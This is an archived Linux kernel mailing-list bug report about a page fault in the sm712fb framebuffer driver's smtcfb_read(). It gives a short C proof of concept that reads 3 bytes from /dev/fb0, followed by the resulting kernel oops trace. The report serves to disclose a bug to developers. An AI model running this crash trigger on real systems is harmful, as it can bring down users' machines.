[BUG] fbdev: sm712fb: Page fault in smtcfb_read

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

I found a minor in the smtcfb_read() function of the driver sm712fb.

This read function can not handle the case that the size of the
buffer is 3 and does not check for it, which may cause a page fault.

Here is a simple PoC:

#include <endian.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
    char buf[10];

    int fd = open("/dev/fb0", O_RDWR);
    read(fd, buf, 3);

    return 0;
}

The following log reveals it:

[ 2432.614490] BUG: unable to handle page fault for address: ffffc90001ffffff
[ 2432.618474] RIP: 0010:smtcfb_read+0x230/0x3e0
[ 2432.626551] Call Trace:
[ 2432.626770]  <TASK>
[ 2432.626950]  vfs_read+0x198/0xa00
[ 2432.627225]  ? do_sys_openat2+0x27d/0x350
[ 2432.627552]  ? __fget_light+0x54/0x340
[ 2432.627871]  ksys_read+0xce/0x190
[ 2432.628143]  do_syscall_64+0x43/0x90

Regards,
Zheyu Ma
[Index of Archives]     [Linux DRI Users]     [Linux Intel Graphics]     [Linux USB Devel]     [Video for Linux]     [Linux Audio Users]     [Yosemite News]     [Linux Kernel]     [Linux SCSI]     [XFree86]     [Linux USB Devel]     [Video for Linux]     [Linux Audio Users]     [Linux Kernel]     [Linux SCSI]     [XFree86]
  Powered by Linux